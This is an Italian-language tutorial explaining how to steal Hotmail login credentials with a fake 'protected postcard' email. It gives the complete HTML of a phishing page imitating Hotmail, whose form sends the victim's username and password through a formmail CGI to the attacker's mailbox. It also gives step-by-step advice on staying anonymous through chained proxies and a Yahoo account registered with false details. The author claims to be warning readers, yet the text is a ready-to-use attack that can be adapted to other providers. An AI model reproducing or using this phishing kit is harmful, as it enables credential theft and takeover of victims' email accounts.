Ho deciso di scrivere questo testo per far notare alle persone,le fregature che girano in rete.
Alcune di queste,sono vere e propie prese di culo....e dopo aver letto questo txt,lo capirete
anche voi.
Oggi spiegherò una piccola tecnica su come fottere un'account Hotmail,naturalmente di posta elet
tronica...Ci sono vari modi x procurarsi un'account e-mail,ad esempio un brute force sul pop3,
Social Engeenering(fingendosi amministratori del servizio),ecc...
Ma che ne pensate di impossessarsi di un'account tramite un banalissimo(quasi) codice html?
Bhè....la cosa vi incuriosisce?
Allora continuate la lettura.
La presa ingiro consiste nel madare una cartolina di saluti protetta alla vittima.
Per protetta intendo che x leggerla,bisogna immettere Login e Password del propio account di posta
elettronica.
Intanto vi riporto il sorgente:
CODICE
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="GENERATOR" content="Mozilla/4.51 [it] (Win98; I) [Netscape]">
<!-- saved from url=(0022)[URL=http://internet.e-mail]http://internet.e-mail[/URL] -->
<!-- saved from url=(0022)[URL=http://internet.e-mail]http://internet.e-mail[/URL] -->
</head>
<body bgcolor="#FFFFFF" link="#000099" vlink="#000099">
<table BORDER=0 CELLSPACING=5 CELLPADDING=5 WIDTH="508" HEIGHT="90%" >
<tr VALIGN=CENTER><th COLSPAN="2"><font face="Arial, Helvetica"><font size=+2>Hotmail,
servizio cartoline online.</font></font>
<font face="Arial, Helvetica"><font size=+2>Per visualizzare la cartolina</font></font>
<font face="Arial, Helvetica"><font size=+2>Inserisci il tuo nome utente
e password</font></font></th>
</tr>
<tr VALIGN=CENTER>
<td ALIGN=CENTER><font face="Arial, Helvetica"><font size=+0>Mittente:
<font color="#000000"><b>Enola
</b></font></font><font color="#000000">Titolo cartolina:<b><font size=+0> Un saluto</font></b></font></font>
<p><b><font face="Arial, Helvetica"><font size=+0><font color="#FF0000">Prego
inserire nome e password.</font><font color="#000000"> </font></font></font></b></td>
</tr>
<tr VALIGN=CENTER>
<td ALIGN=CENTER><form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi" target="_top"><input type=hidden name="recipient" value="vostra@email.it"><input TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com"><input TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><input type="hidden" name="redirect" value="http://www.hotmail.com">
<table BORDER=0 CELLSPACING=5 CELLPADDING=0 >
<tr>
<td><font face="Arial, Helvetica"><font size=-1>Login Name:</font></font>
<input type="text" name="login" size="16" maxlength="16"></td>
<td><font face="Arial, Helvetica"><font size=-1>Password:</font></font>
<input type="password" name="passwd" size="16" maxlength="16"><input type="submit" value="Enter"></td>
</tr>
</table>
</form></td>
</tr>
</tr>
</table>
[IMG]http://216.33.236.24/lgo_msn_140x60.gif[/IMG]
[IMG]http://216.33.236.24/lgo_hmr_105x32.gif[/IMG]
</body>
</html>
Create un nuovo file di hotmail.txt e copiateci il codice soprasrante.
Dopo rinominate il file .txt in .html e apritelo.
Come potete notare sembra una vera e propia cartolina.
C'è l'intestazione che rende la cosa convincente:
Hotmail, servizio cartoline online.
Per visualizzare la cartolina
Inserisci il tuo nome utente e password
Poi il nome del mittente,e l'oggetto della cartolina:
Mittente: Enola Titolo cartolina: Un saluto
Poi c'è il box dove và inserita il login e la password che in seguito verrà in vostro possesso.
Infine troviamo il tocco di classe,cioè i due loghi di hotmail,che rendono la situazione + fattibile.
Voi penserete:Ma come caxxo facciamo ad ottenere la pass tramite questa cartolina?
Semplice,vi verrà spedita direttamente nella vostra e-mail.
Prima di tutto dobbiamo provare a farci una casella e-mail anonima in un sito che permetta di
mandare mail anche in formato html,x esempio yahoo.
Quindi usufruiremo del nostro bel programma MultiProxy,un tool che consiste nel connettersi ad
un sito tramite una catena di proxy e usando la tecnica del redirect.
Allora,Multi proxy è un programma che fa il redirect,cioè tutti i comandi che noi mandiamo
al server,e le risposte(del server)vengono filtrate da tutti i proxy che sono addati nella
lista del programma,con la tecnica dei proxy incatenati.Cioè proxy 1 si collega al 2,il 2
al proxy 3 ecc. fino a che l'ultimo proxy non si collega al sito desiderato.
Adesso apriamo il multi proxy,nel riquadro del programma,sulla destra vediamo il bottone
di nome Options.
Clikkando si aprirà un'altro menù,e noi andiamo su "Proxy server list" .
Adesso vediamo un bottoncino di nome "Menù -->" ,clikkiamo,e sul menù a cascata che si apre,
passiamo con il mousu sulla voce "File",si aprirà un'altro menù a cascata dove noi clikkeremo
su "Import proxy list" .
Adesso selezioniamo il nostro file.txt contenente dei bei proxy anonimi e clikkiamo su OK.
Adesso controlliamo l'anonimità dei proxy,clikkando sul bottone "check all" all'avvio del
programma.
Bisogna fare attenzione ad alcuni server che non fanno fare la verifica di anonimità,quindi
anche se sono anonimi,noi non c'è ne potremmo accorgere.
Adesso apriamo il nostro brosware di fiducia,e ci rechiamo nella sezione propietà.
Attiviamo la possibilità di uso di proxy,e dove richiede il nome o il numero ip del proxy,mettiamo
127.0.0.1 e la porta 8088.
Adesso vi spiego xchè nel brosware abbiamo settato ip:127.0.0.1 port:8088 nel setup dei proxy.
Tutto questo xchè il programma riconosce il nostro server,con il nostro ip di default,cioè
127.0.0.1 usando la porta 8088.
Quindi,anche se noi vogliamo usare questo programma(MultiProxy) x navigare sul web,quando
settiamo il proxy,dobbiamo mettere a ip:127.0.0.1 e a porta:8088 .
Applichiamo tutte le modifiche fatte alle propietà,e colleghiamoci su
www.yahoo.it .
Facciamo l'iscrizione dando dati falsi,ed ecco creato il nostro account anonimo(teoricamente anonimo).
Adesso guardiamo il codice sorgente html e modificate la seguente stringa:
CODICE
<td ALIGN=CENTER><form METHOD=POST ACTION="http://www.tiscalinet.it/cgi-bin/formmail.cgi" target="_top"><input type=hidden name="recipient" value="vostra@email.it"><input TYPE="hidden" NAME="next-url" VALUE="http://www.hotmail.com"><input TYPE="hidden" NAME="subject" VALUE="Hotmail Password"><input type="hidden" name="redirect" value="http://www.hotmail.com">
Dobbiamo modificare value="
[email protected]"> mettendo l'indirizzo e-mail dell'account anonimo
appena registrato.
Poi dobbiamo modificare le seguenti stringhe a nostro piacimento,cioè:
CODICE
<td ALIGN=CENTER><font face="Arial, Helvetica"><font size=+0>Mittente:
<font color="#000000"><b>Enola
Come vediamo,lì il mittente della cartolina si chiama Enola,ma noi possiamo cambialro a nostro piacere.
Stessa cosa vale x la seguente stringa:
CODICE
</b></font></font><font color="#000000">Titolo cartolina:<b><font size=+0> Un saluto</font></b></font></font>
Il titolo della cartolina è "Un saluto" ma noi abbiamo fantasia,quindi possiamo mettere altro
Adesso ci logghiamo nel sito di yahoo(usare sempre MultiProxy)e scriviamo una nuova mail.
Mettiamo l'email della vittima a cui inviare la cartolina e poi come oggetto usiamo la fantasia.
Adesso,nel box dove và inserito il testo,ci incolliamo il codice html della cartolina cone le
relative modifiche fatte.
Prima di premere invia,dobbiamo abilitare la funzione "Usa i tag HTML anteprima html" clikkando
sul tondino accanto.
Premiamo invio,e attendiamo che la mial sia stata inoltrata.
Adesso non manca che aspettare,se la persona a cui avete mandato la mail è un po fessacchiotta,
entro poco tempo vi arriverà una mail senza Oggetto.
Quando la aprirete,leggerete la password e il login del suo account mail.
Naturalmente questo metodo non l'ho inventato io,ma ho voluto scrivere un piccolo articolo su come
usarlo.
Questo script,modificato,può essere utilizzato x altri provider che offrono accoutn di e-mail.
Come ho ripetuto molte volte......basta usare la fantasia! =))))
